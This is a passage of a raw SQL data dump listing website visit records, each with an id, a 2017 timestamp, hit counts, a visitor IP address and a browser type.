,1,1,0,0,'51.255.65.97','other'),(174731,1509953834,1,1,0,0,'217.182.132.153','other'),(174732,1509953860,1,1,0,0,'8.29.198.26','other'),(174733,1509953889,1,1,0,0,'95.132.59.117','firefox'),(174734,1509954189,1,1,0,0,'217.182.132.185','other'),(174735,1509954393,1,1,0,0,'51.255.65.46','other'),(174736,1509954444,1,1,0,0,'80.91.167.115','firefox'),(174737,1509954593,1,1,0,0,'91.196.178.67','firefox'),(174738,1509954710,1,1,0,0,'51.255.65.59','other'),(174739,1509954713,1,0,1,0,'66.249.76.137',''),(174740,1509954742,1,1,0,0,'51.255.71.121','other'),(174741,1509954870,1,1,0,0,'51.255.65.28','other'),(174742,1509954887,1,1,0,0,'217.69.134.161','other'),(174743,1509955161,1,1,0,0,'91.196.178.165','chrome'),(174744,1509955190,1,1,0,0,'51.255.65.82','other'),(174745,1509955467,1,1,0,0,'37.9.113.157','other'),(174746,1509955656,1,1,0,0,'37.9.113.132','other'),(174747,1509955824,1,1,0,0,'217.182.132.74','other'),(174748,1509955965,2,2,0,0,'95.213.141.126','opera'),(174749,1509955975,1,1,0,0,'91.196.178.67','chrome'),(174750,1509956266,1,1,0,0,'164.132.162.187','other'),(174751,1509956760,1,1,0,0,'95.135.254.250','chrome'),(174752,1509956910,3,3,0,0,'91.196.178.67','chrome'),(174753,1509957468,1,1,0,0,'51.255.71.113','other'),(174754,1509958177,1,1,0,0,'91.196.178.67','chrome'),(174755,1509958933,1,1,0,0,'66.249.76.131','chrome'),(174756,1509958996,1,1,0,0,'51.255.65.36','other'),(174757,1509959621,1,1,0,0,'91.196.178.164','other'),(174758,1509959654,1,1,0,0,'94.156.144.191','firefox'),(174759,1509959717,1,1,0,0,'217.182.132.190','other'),(174760,1509960458,1,1,0,0,'217.182.132.18','other'),(174761,1509960867,1,1,0,0,'217.182.132.91','other'),(174762,1509960955,1,1,0,0,'40.77.167.23','other'),(174763,1509961881,1,1,0,0,'51.255.65.25','other'),(174764,1509961956,1,1,0,0,'46.201.113.138','chrome'),(174765,1509962000,1,1,0,0,'157.55.39.206','other'),(174766,1509962018,12,12,0,0,'91.121.88.181','other'),(174767,1509962050,1,1,0,0,'217.182.132.186','other'),(174768,1509962089,1,1,0,0,'217.182.132.154','other'),(174769,1509962390,1,1,0,0,'51.255.65.72','other'),(174770,1509962752,1,1,0,0,'164.132.162.155','other'),(174771,1509962771,1,1,0,0,'51.255.71.122','other'),(174772,1509962813,1,1,0,0,'51.255.65.13','other'),(174773,1509963158,1,1,0,0,'51.255.65.31','other'),(174774,1509963176,1,1,0,0,'40.77.167.56','other'),(174775,1509963384,1,1,0,0,'91.196.178.70','chrome'),(174776,1509964123,1,1,0,0,'37.55.129.203','chrome'),(174777,1509964130,1,1,0,0,'141.8.142.74','other'),(174778,1509964133,1,1,0,0,'217.182.132.154','other'),(174779,1509964521,1,1,0,0,'51.255.65.27','other'),(174780,1509964698,1,1,0,0,'8.29.198.25','other'),(174781,1509964733,1,1,0,0,'78.27.185.36','chrome'),(174782,1509964856,1,1,0,0,'91.196.178.67','chrome'),(174783,1509964893,1,1,0,0,'217.182.132.191','other'),(174784,1509964902,1,1,0,0,'217.182.132.91','other'),(174785,1509965048,1,1,0,0,'137.74.207.116','other'),(174786,1509965144,1,1,0,0,'217.182.132.35','other'),(174787,1509965369,1,1,0,0,'91.196.178.70','chrome'),(174788,1509965687,1,1,0,0,'78.27.185.36','chrome'),(174789,1509965689,1,1,0,0,'91.196.178.70','firefox'),(174790,1509965725,1,1,0,0,'217.182.132.4','other'),(174791,1509965907,1,1,0,0,'46.174.125.28','chrome'),(174792,1509966090,1,1,0,0,'51.255.65.57','other'),(174793,1509966303,1,1,0,0,'217.182.132.66','other'),(174794,1509966370,1,1,0,0,'51.255.65.69','other'),(174795,1509966415,1,1,0,0,'217.182.132.177','other'),(174796,1509966804,1,1,0,0,'91.196.178.67','chrome'),(174797,1509966987,1,1,0,0,'66.45.243.200','other'),(174798,1509967146,1,1,0,0,'51.255.65.95','other'),(174799,1509967156,1,1,0,0,'40.77.167.56','other'),(174800,1509967194,1,1,0,0,'66.102.9.27','chrome'),(174801,1509967353,1,1,0,0,'216.244.66.237','other'),(174802,1509967575,1,1,0,0,'217.182.132.29','other'),(174803,1509967597,1,1,0,0,'217.182.132.80','other'),(174804,1509968093,1,1,0,0,'51.255.65.59','other'),(174805,1509968215,1,1,0,0,'217.182.132.152','other'),(174806,1509968503,1,1,0,0,'217.182.132.7','other'),(174807,1509968548,1,1,0,0,'77.222.159.123','firefox'),(174808,1509968639,1,1,0,0,'37.9.113.115','other'),(174809,1509969046,1,1,0,0,'217.182.132.25','other'),(174810,1509969112,1,1,0,0,'51.255.65.91','other'),(174811,1509969239,1,1,0,0,'217.182.132.5','other'),(174812,1509969249,1,1,0,0,'51.255.65.38','other'),(174813,1509969573,1,1,0,0,'51.255.65.40','other'),(174814,1509969924,1,1,0,0,'162.210.196.97','other'),(174815,1509970012,1,1,0,0,'217.182.132.175','other'),(174816,1509970123,1,1,0,0,'216.244.66.237','other'),(174817,1509970527,1,1,0,0,'51.255.65.14','other'),(174818,1509970674,1,1,0,0,'51.255.65.7','other'),(174819,1509971494,1,1,0,0,'217.182.132.175','other'),(174820,1509971630,1,1,0,0,'217.182.132.33','other'),(174821,1509971775,1,1,0,0,'51.255.65.7','other'),(174822,1509972336,1,1,0,0,'37.52.18.117','firefox'),(174823,1509972852,1,1,0,0,'91.196.177.46','firefox'),(174824,1509973292,1,1,0,0,'217.182.132.57','other'),(174825,1509973414,1,1,0,0,'185.76.10.70','chrome'),(174826,1509973420,1,1,0,0,'40.77.167.56','other'),(174827,1509973447,1,0,1,0,'66.249.76.114',''),(174828,1509973541,1,1,0,0,'178.154.200.7','other'),(174829,1509973566,1,1,0,0,'51.255.71.129','other'),(174830,1509973646,1,1,0,0,'217.182.132.18','other'),(174831,1509973710,1,1,0,0,'217.182.132.64','other'),(174832,1509974198,2,2,0,0,'46.201.241.5','chrome'),(174833,1509974548,2,2,0,0,'51.255.65.3','other'),(174834,1509974690,1,1,0,0,'37.9.113.101','other'),(174835,1509975054,1,1,0,0,'87.250.224.46','other'),(174836,1509975404,1,1,0,0,'217.182.132.21','other'),(174837,1509975531,1,1,0,0,'8.29.198.27','other'),(174838,1509976174,1,1,0,0,'217.182.132.181','other'),(174839,1509976523,1,1,0,0,'164.132.162.158','other'),(174840,1509976603,1,1,0,0,'137.74.207.108','other'),(174841,1509976672,1,1,0,0,'46.161.9.55','chrome'),(174842,1509976804,1,1,0,0,'217.182.132.35','other'),(174843,1509977020,1,0,1,0,'66.249.76.114',''),(174844,1509977033,1,1,0,0,'66.249.76.113','chrome'),(174845,1509977258,1,1,0,0,'217.182.132.87','other'),(174846,1509977291,1,1,0,0,'164.132.162.157','other'),(174847,1509977441,1,1,0,0,'51.255.65.9','other'),(174848,1509977778,1,1,0,0,'217.182.132.184','other'),(174849,1509977832,1,1,0,0,'217.182.132.37','other'),(174850,1509977858,1,1,0,0,'51.255.65.27','other'),(174851,1509978102,1,1,0,0,'217.182.132.155','other'),(174852,1509978644,1,1,0,0,'91.196.178.70','chrome'),(174853,1509978857,1,1,0,0,'51.255.71.132','other'),(174854,1509979145,1,1,0,0,'51.255.65.84','other'),(174855,1509979644,1,1,0,0,'66.249.65.157','chrome'),(174856,1509979933,1,1,0,0,'217.182.132.185','other'),(174857,1509980120,1,1,0,0,'51.255.65.36','other'),(174858,1509980650,1,1,0,0,'217.182.132.28','other'),(174859,1509980864,1,1,0,0,'217.182.132.73','other'),(174860,1509981167,1,1,0,0,'137.74.207.159','other'),(174861,1509982941,1,1,0,0,'51.255.65.51','other'),(174862,1509984060,1,1,0,0,'51.255.65.43','other'),(174863,1509985426,1,1,0,0,'217.182.132.68','other'),(174864,1509985551,2,2,0,0,'95.10.184.85','other'),(174865,1509985708,1,1,0,0,'217.182.132.17','other'),(174866,1509986047,1,1,0,0,'51.255.65.87','other'),(174867,1509986073,1,1,0,0,'51.255.71.116','other'),(174868,1509986086,1,1,0,0,'95.220.97.155','msie'),(174869,1509986370,1,1,0,0,'8.29.198.25','other'),(174870,1509986545,1,1,0,0,'51.255.65.26','other'),(174871,1509986590,1,1,0,0,'51.255.65.42','other'),(174872,1509987021,1,1,0,0,'217.69.133.216','other'),(174873,1509987469,1,1,0,0,'37.9.113.115','other'),(174874,1509987470,1,1,0,0,'141.8.142.74','other'),(174875,1509987630,1,1,0,0,'51.255.65.224','other'),(174876,1509987742,1,1,0,0,'91.196.178.164','chrome'),(174877,1509988613,1,1,0,0,'51.255.65.21','other'),(174878,1509988629,1,1,0,0,'51.255.65.68','other'),(174879,1509988854,1,1,0,0,'217.182.132.57','other'),(174880,1509989122,1,1,0,0,'217.182.132.174','other'),(174881,1509989336,1,1,0,0,'217.182.132.73','other'),(174882,1509989585,1,1,0,0,'137.74.207.102','other'),(174883,1509989867,1,1,0,0,'178.95.230.189','opera'),(174884,1509989982,1,0,1,0,'66.249.65.125',''),(174885,1509990010,1,0,1,0,'66.249.76.113',''),(174886,1509990136,1,1,0,0,'217.182.132.173','other'),(174887,1509990166,2,2,0,0,'216.244.66.237','other'),(174888,1509990528,1,1,0,0,'66.249.93.40','chrome'),(174889,1509991098,1,1,0,0,'51.255.65.95','other'),(174890,1509991231,1,1,0,0,'176.8.197.46','firefox'),(174891,1509991315,1,1,0,0,'217.182.132.5','other'),(174892,1509992086,1,1,0,0,'217.182.132.23','other'),(174893,1509992164,1,1,0,0,'51.255.65.74','other'),(174894,1509992385,1,1,0,0,'51.255.71.116','other'),(174895,1509992597,1,1,0,0,'217.182.132.240','other'),(174896,1509992668,1,1,0,0,'164.132.162.153','other'),(174897,1509993058,1,1,0,0,'51.255.71.128','other'),(174898,1509993161,1,1,0,0,'217.182.132.21','other'),(174899,1509993202,1,1,0,0,'217.182.132.33','other'),(174900,1509993759,1,1,0,0,'157.55.39.225','other'),(174901,1509994292,1,1,0,0,'91.196.178.67','firefox'),(174902,1509994660,1,1,0,0,'217.182.132.170','other'),(174903,1509994893,1,1,0,0,'217.182.132.187','other'),(174904,1509995072,1,1,0,0,'87.250.224.46','other'),(174905,1509995154,1,1,0,0,'217.182.132.146','other'),(174906,1509995611,1,1,0,0,'217.69.133.250','other'),(174907,1509995914,1,1,0,0,'137.74.207.188','other'),(174908,1509996579,1,1,0,0,'51.255.64.106','other'),(174909,1509996798,1,1,0,0,'51.255.65.87','other'),(174910,1509996877,1,0,1,0,'66.249.65.156',''),(174911,1509996898,1,1,0,0,'137.74.207.102','other'),(174912,1509996959,1,1,0,0,'51.255.65.46','other'),(174913,1509997203,1,1,0,0,'8.29.198.27','other'),(174914,1509997272,1,1,0,0,'137.74.207.159','other'),(174915,1509997344,1,1,0,0,'217.182.132.28','other'),(174916,1509998350,1,1,0,0,'64.246.165.150','firefox'),(174917,1509998551,1,1,0,0,'51.255.64.106','other'),(174918,1509999407,1,1,0,0,'51.255.65.5','other'),(174919,1509999867,1,1,0,0,'51.255.65.89','other'),(174920,1510000556,1,1,0,0,'51.255.65.25','other'),(174921,1510000832,1,1,0,0,'51.255.65.72','other'),(174922,1510001452,1,1,0,0,'51.255.65.88','other'),(174923,1510001920,1,1,0,0,'51.255.65.96','other'),(174924,1510001950,1,1,0,0,'217.182.132.64','other'),(174925,1510001994,1,1,0,0,'216.244.66.237','other'),(174926,1510002406,1,0,1,0,'66.249.65.155',''),(174927,1510002478,1,1,0,0,'217.182.132.36','other'),(174928,1510002683,1,1,0,0,'217.182.132.183','other'),(174929,1510002738,1,1,0,0,'77.37.220.101','msie'),(174930,1510002758,1,1,0,0,'51.255.65.38','other'),(174931,1510003235,1,1,0,0,'217.182.132.88','other'),(174932,1510003418,1,1,0,0,'217.182.132.176','other'),(174933,1510004090,1,1,0,0,'217.182.132.85','other'),(174934,1510004421,1,1,0,0,'217.69.143.217','firefox'),(174935,1510004589,1,1,0,0,'207.46.13.132','other'),(174936,1510004918,1,1,0,0,'217.182.132.76','other'),(174937,1510005003,1,1,0,0,'51.255.65.37','other'),(174938,1510005042,1,0,1,0,'66.249.65.121',''),(174939,1510005165,1,1,0,0,'157.55.39.206','other'),(174940,1510005179,1,1,0,0,'51.255.65.14','other'),(174941,1510005278,1,1,0,0,'217.182.132.86','other'),(174942,1510005318,16,16,0,0,'154.16.138.15','other'),(174943,1510005686,1,1,0,0,'91.209.11.236','other'),(174944,1510007486,1,1,0,0,'217.182.132.51','other'),(174945,1510008036,1,1,0,0,'8.29.198.26','other'),(174946,1510008228,1,1,0,0,'51.255.65.64','other'),(174947,1510008603,1,1,0,0,'217.182.132.180','other'),(174948,1510008994,1,1,0,0,'40.77.167.56','other'),(174949,1510009412,1,1,0,0,'217.182.132.65','other'),(174950,1510009999,1,1,0,0,'137.74.207.102','other'),(174951,1510010303,1,1,0,0,'46.188.107.40','msie'),(174952,1510011187,1,1,0,0,'51.255.65.7','other'),(174953,1510011367,1,1,0,0,'37.9.113.101','other'),(174954,1510011661,2,2,0,0,'35.184.189.105','other'),(174955,1510012514,1,1,0,0,'51.255.65.224','other'),(174956,1510012690,1,1,0,0,'51.255.65.49','other'),(174957,1510012843,1,1,0,0,'217.182.132.193','other'),(174958,1510013102,1,1,0,0,'51.255.65.76','other'),(174959,1510013689,1,1,0,0,'51.255.71.127','other'),(174960,1510013804,1,1,0,0,'217.182.132.175','other'),(174961,1510013848,73,73,0,0,'23.237.4.26','other'),(174962,1510014015,1,1,0,0,'217.182.132.174','other'),(174963,1510014200,1,1,0,0,'51.255.65.89','other'),(174964,1510014546,1,1,0,0,'51.255.65.41','other'),(174965,1510014618,1,1,0,0,'217.182.132.94','other'),(174966,1510014756,1,1,0,0,'217.182.132.185','other'),(174967,1510014944,1,1,0,0,'51.255.65.47','other'),(174968,1510015054,1,1,0,0,'217.182.132.65','other'),(174969,1510015109,1,1,0,0,'217.182.132.16','other'),(174970,1510015379,1,1,0,0,'180.76.15.150','other'),(174971,1510016078,1,1,0,0,'137.74.207.102','other'),(174972,1510016873,1,1,0,0,'217.182.132.94','other'),(174973,1510016971,1,1,0,0,'46.251.70.249','msie'),(174974,1510017041,1,1,0,0,'217.182.132.171','other'),(174975,1510017457,1,1,0,0,'51.255.65.67','other'),(174976,1510017584,1,1,0,0,'217.182.132.72','other'),(174977,1510017590,1,1,0,0,'35.184.189.105','other'),(174978,1510017727,1,1,0,0,'51.255.65.90','other'),(174979,1510017985,1,1,0,0,'137.74.207.161','other'),(174980,1510018668,1,1,0,0,'51.255.65.224','other'),(174981,1510018720,1,1,0,0,'217.182.132.25','other'),(174982,1510018866,1,1,0,0,'8.29.198.25','other'),(174983,1510019024,1,1,0,0,'217.182.132.53','other'),(174984,1510019053,1,1,0,0,'151.80.27.116','other'),(174985,1510019439,1,1,0,0,'217.182.132.50','other'),(174986,1510019670,1,1,0,0,'40.77.167.56','other'),(174987,1510020205,1,1,0,0,'217.182.132.186','other'),(174988,1510020388,1,1,0,0,'216.244.66.237','other'),(174989,1510020905,1,1,0,0,'204.79.180.0','msie'),(174990,1510021515,2,2,0,0,'157.55.39.206','other'),(174991,1510024272,1,1,0,0,'95.24.202.205','msie'),(174992,1510024273,1,1,0,0,'95.28.204.227','msie'),(174993,1510024277,1,1,0,0,'95.24.146.125','msie'),(174994,1510024381,1,0,1,0,'66.249.65.155',''),(174995,1510024745,1,1,0,0,'65.55.210.197','other'),(174996,1510028352,1,1,0,0,'46.161.9.55','chrome'),(174997,1510028691,1,0,1,0,'66.249.76.113',''),(174998,1510029698,1,1,0,0,'8.29.198.25','other'),(174999,1510030392,1,1,0,0,'40.77.167.56','other'),(175000,1510030523,1,0,1,0,'66.249.65.125',''),(175001,1510031389,1,1,0,0,'216.244.66.237','other'),(175002,1510033976,1,1,0,0,'216.244.66.237','other'),(175003,1510035825,1,0,1,0,'66.249.65.155',''),(175004,1510036422,1,1,0,0,'91.196.178.70','chrome'),(175005,1510036858,1,0,1,0,'66.249.65.125',''),(175006,1510037427,1,1,0,0,'217.69.133.229','other'),(175007,1510038078,2,2,0,0,'35.184.189.105','other'),(175008,1510038895,1,1,0,0,'46.161.9.55','firefox'),(175009,1510039084,1,1,0,0,'46.174.125.28','chrome'),(175010,1510039828,1,1,0,0,'91.196.178.135','firefox'),(175011,1510040453,1,1,0,0,'37.52.18.117','firefox'),(175012,1510040533,1,1,0,0,'8.29.198.25','other'),(175013,1510040611,1,0,1,0,'66.249.65.155',''),(175014,1510041120,1,1,0,0,'40.77.167.56','other'),(175015,1510041453,1,0,1,0,'66.249.65.125',''),(175016,1510041687,1,1,0,0,'66.249.76.131','chrome'),(175017,1510041820,1,1,0,0,'217.69.133.10','other'),(175018,1510042997,1,1,0,0,'46.242.73.10','msie'),(175019,1510042998,1,1,0,0,'37.147.99.45','msie'),(175020,1510043094,1,1,0,0,'51.255.71.123','other'),(175021,1510043307,1,0,1,0,'66.249.65.123',''),(175022,1510043499,1,1,0,0,'217.182.132.82','other'),(175023,1510043550,1,1,0,0,'51.255.65.97','other'),(175024,1510043802,1,1,0,0,'37.55.226.176','chrome'),(175025,1510044036,1,1,0,0,'51.255.65.22','other'),(175026,1510044362,1,1,0,0,'51.255.65.77','other'),(175027,1510044483,1,1,0,0,'94.158.81.247','firefox'),(175028,1510044583,1,1,0,0,'37.9.113.80','other'),(175029,1510044857,1,1,0,0,'40.77.167.56','other'),(175030,1510045632,1,1,0,0,'91.196.178.164','chrome'),(175031,1510047332,1,1,0,0,'91.196.178.68','chrome'),(175032,1510048087,1,1,0,0,'141.8.132.22','other'),(175033,1510048518,1,0,1,0,'66.249.76.131',''),(175034,1510048722,1,1,0,0,'46.161.9.55','chrome'),(175035,1510048848,1,0,1,0,'66.249.76.112',''),(175036,1510049202,1,1,0,0,'178.92.179.42','chrome'),(175037,1510049723,1,1,0,0,'37.9.113.132','other'),(175038,1510049771,1,1,0,0,'37.9.113.138','other'),(175039,1510051377,1,1,0,0,'8.29.198.26','other'),(175040,1510051707,1,1,0,0,'37.9.113.63','other'),(175041,1510051891,1,1,0,0,'95.108.181.111','other'),(175042,1510052108,1,1,0,0,'178.162.204.221','firefox'),(175043,1510052227,1,1,0,0,'5.45.207.83','other'),(175044,1510052531,1,0,1,0,'66.249.65.157',''),(175045,1510053316,1,1,0,0,'87.250.224.85','other'),(175046,1510053347,1,1,0,0,'180.76.15.154','other'),(175047,1510053967,1,1,0,0,'194.187.216.84','chrome'),(175048,1510054021,1,1,0,0,'51.255.65.31','other'),(175049,1510054137,1,1,0,0,'217.182.132.193','other'),(175050,1510054498,1,1,0,0,'164.132.162.155','other'),(175051,1510054622,1,1,0,0,'141.8.132.22','other'),(175052,1510054880,1,1,0,0,'217.182.132.4','other'),(175053,1510054901,1,1,0,0,'51.255.71.112','other'),(175054,1510054986,1,1,0,0,'51.255.65.46','other'),(175055,1510055105,1,1,0,0,'5.45.207.49','other'),(175056,1510055108,1,1,0,0,'37.9.113.82','other'),(175057,1510055198,1,1,0,0,'164.132.162.158','other'),(175058,1510055460,1,1,0,0,'141.8.132.19','other'),(175059,1510055898,1,1,0,0,'91.210.34.26','chrome'),(175060,1510056324,1,1,0,0,'95.132.5.46','firefox'),(175061,1510056895,1,1,0,0,'40.77.167.56','other'),(175062,1510056914,1,1,0,0,'5.45.207.83','other'),(175063,1510056958,1,1,0,0,'62.80.174.114','chrome'),(175064,1510057056,1,1,0,0,'137.74.207.159','other'),(175065,1510057125,1,1,0,0,'51.255.71.113','other'),(175066,1510057209,1,1,0,0,'51.255.71.100','other'),(175067,1510057347,1,1,0,0,'141.8.142.50','other'),(175068,1510057491,1,1,0,0,'178.154.200.7','other'),(175069,1510057544,1,1,0,0,'51.255.71.127','other'),(175070,1510057705,1,1,0,0,'46.219.33.141','firefox'),(175071,1510057855,1,0,1,0,'66.249.76.112',''),(175072,1510057880,1,1,0,0,'137.74.203.194','other'),(175073,1510058036,1,1,0,0,'91.196.178.164','chrome'),(175074,1510058302,1,1,0,0,'164.132.162.158','other'),(175075,1510058438,1,1,0,0,'217.182.132.51','other'),(175076,1510058553,1,1,0,0,'217.182.132.193','other'),(175077,1510058851,1,1,0,0,'157.55.39.159','other'),(175078,1510059005,1,1,0,0,'176.118.54.184','chrome'),(175079,1510059579,1,1,0,0,'216.244.66.237','other'),(175080,1510060006,1,1,0,0,'78.111.190.208','chrome'),(175081,1510060258,1,1,0,0,'178.154.171.88','other'),(175082,1510060358,1,1,0,0,'92.112.202.92','firefox'),(175083,1510060370,1,1,0,0,'51.255.65.62','other'),(175084,1510060427,1,1,0,0,'162.210.196.100','other'),(175085,1510060687,1,1,0,0,'217.182.132.69','other'),(175086,1510060718,1,1,0,0,'51.255.65.49','other'),(175087,1510060734,1,1,0,0,'51.255.65.17','other'),(175088,1510060918,1,1,0,0,'51.255.65.67','other'),(175089,1510061222,1,0,1,0,'68.180.230.123',''),(175090,1510061248,1,1,0,0,'165.227.132.181','other'),(175091,1510061361,1,1,0,0,'137.74.207.114','other'),(175092,1510061996,1,1,0,0,'164.132.162.187','other'),(175093,1510062030,1,1,0,0,'157.55.39.159','other'),(175094,1510062141,1,1,0,0,'217.182.132.86','other'),(175095,1510062206,1,1,0,0,'8.29.198.26','other'),(175096,1510062633,1,0,1,0,'66.249.65.155',''),(175097,1510063089,1,1,0,0,'40.77.167.48','other'),(175098,1510063277,1,1,0,0,'164.132.162.187','other'),(175099,1510063722,1,1,0,0,'217.182.132.28','other'),(175100,1510063854,2,2,0,0,'178.154.171.88','other'),(175101,1510064055,1,1,0,0,'83.170.203.202','chrome'),(175102,1510064227,1,1,0,0,'137.74.207.114','other'),(175103,1510064492,1,1,0,0,'91.196.178.162','chrome'),(175104,1510064600,1,1,0,0,'217.182.132.21','other'),(175105,1510064708,1,1,0,0,'46.174.163.134','chrome'),(175106,1510064968,1,1,0,0,'178.154.171.88','other'),(175107,1510065230,1,1,0,0,'217.182.132.66','other'),(175108,1510065362,1,1,0,0,'51.255.71.114','other'),(175109,1510065990,1,1,0,0,'217.182.132.35','other'),(175110,1510066116,1,1,0,0,'178.154.171.88','other'),(175111,1510066148,1,0,1,0,'66.249.76.137',''),(175112,1510066351,1,1,0,0,'137.74.203.194','other'),(175113,1510066526,1,0,1,0,'66.249.76.131',''),(175114,1510066893,1,1,0,0,'217.182.132.52','other'),(175115,1510067031,1,1,0,0,'51.255.65.80','other'),(175116,1510067289,1,1,0,0,'178.154.171.88','other'),(175117,1510067327,1,0,1,0,'66.249.65.157',''),(175118,1510067714,1,1,0,0,'178.92.85.231','chrome'),(175119,1510067821,1,1,0,0,'95.132.88.156','firefox'),(175120,1510068259,1,1,0,0,'193.194.127.253','chrome'),(175121,1510068624,1,1,0,0,'217.182.132.53','other'),(175122,1510068778,1,1,0,0,'51.255.65.79','other'),(175123,1510069015,1,1,0,0,'217.182.132.62','other'),(175124,1510069075,1,0,1,0,'66.249.76.112',''),(175125,1510069077,1,1,0,0,'66.249.65.125','chrome'),(175126,1510069097,1,1,0,0,'91.196.178.69','firefox'),(175127,1510070192,1,1,0,0,'164.132.162.155','other'),(175128,1510070368,1,1,0,0,'51.255.65.48','other'),(175129,1510070377,1,1,0,0,'51.255.65.29','other'),(175130,1510070507,1,1,0,0,'51.255.65.10','other'),(175131,1510070657,1,0,1,0,'66.249.65.156',''),(175132,1510070825,1,1,0,0,'213.180.203.8','other'),(175133,1510070845,1,1,0,0,'218.30.103.183','other'),(175134,1510070883,1,1,0,0,'217.182.132.54','other'),(175135,1510070935,1,1,0,0,'51.255.65.62','other'),(175136,1510071007,1,1,0,0,'176.120.61.47','chrome'),(175137,1510071211,1,1,0,0,'51.255.65.97','other'),(175138,1510071373,1,1,0,0,'51.255.65.96','other'),(175139,1510071856,1,1,0,0,'40.77.167.48','other'),(175140,1510071899,1,1,0,0,'51.255.65.18','other'),(175141,1510071983,1,1,0,0,'37.9.113.134','other'),(175142,1510072243,1,1,0,0,'51.255.71.112','other'),(175143,1510072410,1,1,0,0,'51.255.65.81','other'),(175144,1510072812,1,0,1,0,'66.249.65.156',''),(175145,1510072854,1,1,0,0,'217.182.132.60','other'),(175146,1510073033,1,1,0,0,'8.29.198.25','other'),(175147,1510073045,1,1,0,0,'217.182.132.172','other'),(175148,1510073065,1,1,0,0,'51.255.65.3','other'),(175149,1510073267,1,1,0,0,'51.255.65.7','other'),(175150,1510073507,1,1,0,0,'51.255.71.100','other'),(175151,1510074085,1,1,0,0,'51.255.65.89','other'),(175152,1510074150,1,1,0,0,'188.165.4.128','chrome'),(175153,1510074559,1,0,1,0,'66.249.76.109',''),(175154,1510074888,1,1,0,0,'157.55.39.206','other'),(175155,1510075237,1,1,0,0,'141.8.132.19','other'),(175156,1510075243,1,1,0,0,'37.9.113.74','other'),(175157,1510075293,1,1,0,0,'213.180.203.40','other'),(175158,1510075616,1,1,0,0,'51.255.65.39','other'),(175159,1510076158,1,0,1,0,'66.249.65.157',''),(175160,1510076366,1,1,0,0,'51.255.65.24','other'),(175161,1510076391,1,1,0,0,'137.74.207.109','other'),(175162,1510076447,1,0,1,0,'66.249.65.155',''),(175163,1510076663,1,1,0,0,'164.132.162.188','other'),(175164,1510076997,1,1,0,0,'51.255.65.31','other'),(175165,1510077015,1,0,1,0,'66.249.76.109',''),(175166,1510077941,1,1,0,0,'193.105.62.10','chrome'),(175167,1510078395,1,1,0,0,'95.24.206.183','chrome'),(175168,1510078396,1,1,0,0,'93.80.36.247','chrome'),(175169,1510078397,1,1,0,0,'176.193.117.234','chrome'),(175170,1510078432,1,1,0,0,'51.255.65.83','other'),(175171,1510079116,1,1,0,0,'157.55.39.206','other'),(175172,1510079299,1,1,0,0,'217.182.132.55','other'),(175173,1510079924,1,1,0,0,'178.154.200.7','other'),(175174,1510080013,1,1,0,0,'217.182.132.69','other'),(175175,1510080327,1,0,1,0,'66.249.76.109',''),(175176,1510080360,1,1,0,0,'40.77.167.56','other'),(175177,1510081221,1,1,0,0,'137.74.207.161','other'),(175178,1510081654,1,1,0,0,'216.244.66.237','other'),(175179,1510081661,1,1,0,0,'37.9.113.100','other'),(175180,1510082114,1,1,0,0,'217.182.132.20','other'),(175181,1510082126,1,1,0,0,'91.196.178.34','chrome'),(175182,1510082237,1,1,0,0,'66.249.76.108','chrome'),(175183,1510082329,1,1,0,0,'217.182.132.33','other'),(175184,1510083363,1,1,0,0,'141.8.132.22','other'),(175185,1510083519,1,1,0,0,'37.9.113.100','other'),(175186,1510083588,1,1,0,0,'37.9.113.132','other'),(175187,1510083640,1,1,0,0,'217.182.132.22','other'),(175188,1510083824,1,1,0,0,'176.31.231.10','other'),(175189,1510083860,1,1,0,0,'8.29.198.25','other'),(175190,1510083880,1,1,0,0,'178.154.171.55','other'),(175191,1510084453,1,1,0,0,'157.55.39.206','other'),(175192,1510084758,1,1,0,0,'37.9.113.101','other'),(175193,1510085092,1,1,0,0,'5.45.207.58','other'),(175194,1510086259,1,1,0,0,'217.182.132.52','other'),(175195,1510086528,2,2,0,0,'51.255.65.84','other'),(175196,1510086559,1,1,0,0,'51.255.65.45','other'),(175197,1510087473,1,0,1,0,'66.249.66.157',''),(175198,1510087989,1,1,0,0,'51.255.71.112','other'),(175199,1510088135,1,1,0,0,'51.255.71.113','other'),(175200,1510088178,1,1,0,0,'178.154.171.4','other'),(175201,1510088572,1,1,0,0,'51.255.65.86','other'),(175202,1510088730,1,1,0,0,'51.255.65.91','other'),(175203,1510088973,4,4,0,0,'95.10.191.32','other'),(175204,1510089116,1,1,0,0,'217.182.132.81','other'),(175205,1510089850,1,1,0,0,'217.182.132.241','other'),(175206,1510091012,2,1,1,0,'66.249.76.107',''),(175207,1510091954,1,1,0,0,'180.76.15.138','other'),(175208,1510092154,1,0,1,0,'66.249.76.107',''),(175209,1510092165,1,1,0,0,'66.102.9.131','chrome'),(175210,1510092607,2,2,0,0,'217.182.132.60','other'),(175211,1510092698,1,1,0,0,'217.182.132.187','other'),(175212,1510094522,1,1,0,0,'217.182.132.86','other'),(175213,1510094552,1,1,0,0,'217.182.132.173','other'),(175214,1510094685,1,1,0,0,'8.29.198.27','other'),(175215,1510094760,1,1,0,0,'216.244.66.237','other'),(175216,1510094878,1,1,0,0,'51.255.65.4','other'),(175217,1510095763,1,1,0,0,'51.255.65.43','other'),(175218,1510095915,1,1,0,0,'51.255.65.224','other'),(175219,1510096766,1,1,0,0,'137.74.203.194','other'),(175220,1510096767,1,1,0,0,'217.69.136.207','other'),(175221,1510097119,1,1,0,0,'66.249.76.109','chrome'),(175222,1510097179,1,1,0,0,'137.74.207.108','other'),(175223,1510097199,1,1,0,0,'217.182.132.71','other'),(175224,1510097462,1,1,0,0,'217.182.132.187','other'),(175225,1510097488,1,1,0,0,'51.255.65.95','other'),(175226,1510097840,1,1,0,0,'151.80.27.118','other'),(175227,1510097944,1,1,0,0,'66.249.66.76','chrome'),(175228,1510097957,1,0,1,0,'66.249.76.89',''),(175229,1510098039,1,1,0,0,'217.182.132.172','other'),(175230,1510099568,1,1,0,0,'51.255.71.111','other'),(175231,1510099684,1,1,0,0,'51.255.65.51','other'),(175232,1510100134,1,1,0,0,'217.182.132.61','other'),(175233,1510100178,1,1,0,0,'51.255.65.69','other'),(175234,1510100190,1,1,0,0,'51.255.65.57','other'),(175235,1510100647,2,2,0,0,'137.74.207.102','other'),(175236,1510101383,1,1,0,0,'94.156.144.191','firefox'),(175237,1510102872,1,1,0,0,'137.74.207.161','other'),(175238,1510103235,1,1,0,0,'217.182.132.53','other'),(175239,1510103303,1,1,0,0,'137.74.207.159','other'),(175240,1510103306,2,2,0,0,'51.255.65.10','other'),(175241,1510103495,1,1,0,0,'217.182.132.240','other'),(175242,1510103668,1,1,0,0,'217.182.132.64','o